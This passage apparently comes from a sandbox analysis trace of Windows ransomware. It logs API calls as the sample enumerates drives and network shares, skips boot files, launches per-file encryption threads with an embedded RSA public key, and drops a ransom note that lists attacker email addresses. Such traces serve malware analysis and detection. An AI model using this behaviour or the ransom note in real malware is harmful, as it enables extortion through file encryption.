number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0146.822] CreateFileW (lpFileName="C:\\Windows\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\windows\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.822] CreateFileW (lpFileName="C:\\Windows\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\windows\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.822] FindFirstFileW (in: lpFileName="C:\\Windows\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0146.822] PathFindFileNameW (pszPath="C:\\Windows") returned="Windows" [0146.822] lstrcpyW (in: lpString1=0x17e824, lpString2="Windows" | out: lpString1="Windows") returned="Windows" [0146.823] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0146.823] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0146.823] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0 [0146.823] FindClose (in: hFindFile=0x3a54d0 | out: hFindFile=0x3a54d0) returned 1 [0146.823] FindClose (in: hFindFile=0x3a54d0 | out: hFindFile=0x3a54d0) returned 0 [0146.823] Sleep (dwMilliseconds=0x3e8) [0147.831] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x180b64 | out: lphEnum=0x180b64*=0x43722f8) returned 0x0 [0147.921] WNetEnumResourceW (in: hEnum=0x43722f8, lpcCount=0x180b60, lpBuffer=0x43911c8, lpBufferSize=0x180b5c | out: lpcCount=0x180b60, lpBuffer=0x43911c8, lpBufferSize=0x180b5c) returned 0x0 [0147.921] WNetCloseEnum (hEnum=0x43722f8) returned 0x0 [0147.921] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x43911c8, lphEnum=0x180b34 | out: lphEnum=0x180b34*=0x4369fb8) returned 0x0 [0147.924] WNetEnumResourceW (in: hEnum=0x4369fb8, lpcCount=0x180b30, lpBuffer=0x4398ed0, lpBufferSize=0x180b2c | out: lpcCount=0x180b30, lpBuffer=0x4398ed0, lpBufferSize=0x180b2c) returned 0x103 [0147.924] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x43911e8, lphEnum=0x180b34 | out: lphEnum=0x180b34*=0x0) returned 0x4b8 [0160.219] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x4391208, lphEnum=0x180b34 | out: lphEnum=0x180b34*=0x0) returned 0x4c6 [0160.219] OutputDebugStringA (lpOutputString="END1") [0160.219] OutputDebugStringA (lpOutputString="START2") [0160.219] SetErrorMode (uMode=0x1) returned 0x1 [0160.219] GetLogicalDriveStringsW (in: nBufferLength=0x34, lpBuffer=0x1815c4 | out: lpBuffer="C:\\") returned 0x4 [0160.220] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0160.220] SetErrorMode (uMode=0x1) returned 0x1 [0160.220] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.220] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.220] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0160.220] lstrcatW (in: lpString1="C:\\", lpString2="*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0160.220] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x43723b8 [0160.220] PathFindFileNameW (pszPath="C:") returned="C:" [0160.220] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.220] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.220] lstrcmpW (lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX", lpString2="..") returned 1 [0160.220] lstrcmpW (lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX", lpString2=".") returned 1 [0160.220] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0160.220] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="ntldr") returned 0x0 [0160.220] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="NTLDR") returned 0x0 [0160.220] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0160.221] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="ntdetect.com") returned 0x0 [0160.221] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0160.221] OutputDebugStringW (lpOutputString="\\\\?\\C:\\") [0160.221] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.221] lstrcpyW (in: lpString1=0x1800fc, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0160.221] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x960 [0160.221] Sleep (dwMilliseconds=0x96) [0160.373] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.373] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.373] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0160.373] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0160.373] StrStrW (lpFirst="bootmgr", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0160.373] StrStrW (lpFirst="bootmgr", lpSrch="ntldr") returned 0x0 [0160.374] StrStrW (lpFirst="bootmgr", lpSrch="NTLDR") returned 0x0 [0160.374] StrStrW (lpFirst="bootmgr", lpSrch="NTDETECT.COM") returned 0x0 [0160.374] StrStrW (lpFirst="bootmgr", lpSrch="ntdetect.com") returned 0x0 [0160.374] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0160.374] OutputDebugStringW (lpOutputString="\\\\?\\C:\\") [0160.374] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.374] lstrcpyW (in: lpString1=0x1800fc, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0160.374] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.374] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0160.374] WaitForSingleObject (hHandle=0x1e0, dwMilliseconds=0xffffffff) returned 0x0 [0160.376] Sleep (dwMilliseconds=0x96) [0160.529] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.529] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.529] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.530] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0160.530] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0160.530] StrStrW (lpFirst="hiberfil.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0160.530] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntldr") returned 0x0 [0160.530] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTLDR") returned 0x0 [0160.530] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTDETECT.COM") returned 0x0 [0160.530] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntdetect.com") returned 0x0 [0160.530] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0160.530] OutputDebugStringW (lpOutputString="\\\\?\\C:\\") [0160.530] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.530] lstrcpyW (in: lpString1=0x1800fc, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0160.530] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.530] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1cc [0160.531] Sleep (dwMilliseconds=0x96) [0160.685] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.685] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.685] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1 [0160.685] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1 [0160.685] StrStrW (lpFirst="pagefile.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0160.686] StrStrW (lpFirst="pagefile.sys", lpSrch="ntldr") returned 0x0 [0160.686] StrStrW (lpFirst="pagefile.sys", lpSrch="NTLDR") returned 0x0 [0160.686] StrStrW (lpFirst="pagefile.sys", lpSrch="NTDETECT.COM") returned 0x0 [0160.686] StrStrW (lpFirst="pagefile.sys", lpSrch="ntdetect.com") returned 0x0 [0160.686] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0160.686] OutputDebugStringW (lpOutputString="\\\\?\\C:\\") [0160.686] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.686] lstrcpyW (in: lpString1=0x1800fc, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0160.686] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d0 [0160.686] Sleep (dwMilliseconds=0x96) [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.844] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.844] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0160.844] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0160.844] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0160.844] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0 [0160.844] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.844] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 0 [0160.844] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.844] lstrcatW (in: lpString1="C:", lpString2="\\*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0160.844] SetErrorMode (uMode=0x1) returned 0x1 [0160.844] wsprintfW (in: param_1=0x17f6bc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\_HELP_INSTRUCTION.TXT") returned 24 [0160.844] GetUserNameW (in: lpBuffer=0x17d498, pcbBuffer=0x17d284 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17d284) returned 1 [0160.844] wsprintfW (in: param_1=0x17d290, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.844] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17d28c | out: phkResult=0x17d28c*=0x1ec) returned 0x0 [0160.844] RegQueryValueExW (in: hKey=0x1ec, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4375088, lpcbData=0x17d288*=0x104 | out: lpType=0x0, lpData=0x4375088*=0x65, lpcbData=0x17d288*=0x4a) returned 0x0 [0160.845] RegCloseKey (hKey=0x1ec) returned 0x0 [0160.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17e6bc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.845] wsprintfW (in: param_1=0x17d6bc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.845] CreateFileW (lpFileName="C:\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0160.845] CloseHandle (hObject=0x1ec) returned 1 [0160.845] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x4372378 [0160.845] PathFindFileNameW (pszPath="C:") returned="C:" [0160.845] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.845] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0160.845] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0160.845] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.845] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.845] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0160.845] SetErrorMode (uMode=0x1) returned 0x1 [0160.845] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0160.845] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0160.845] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0160.845] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0160.845] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.845] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") returned="$Recycle.Bin" [0160.845] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0160.845] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.846] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0160.846] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0160.846] SetErrorMode (uMode=0x1) returned 0x1 [0160.846] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT") returned 37 [0160.846] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.846] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.846] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.846] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43752b8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x43752b8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.846] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.846] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.846] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.846] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.846] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.846] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") returned="$Recycle.Bin" [0160.846] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0160.847] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.847] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.847] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.847] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0160.847] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0160.847] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.847] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.847] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0160.847] SetErrorMode (uMode=0x1) returned 0x1 [0160.847] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0160.847] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" 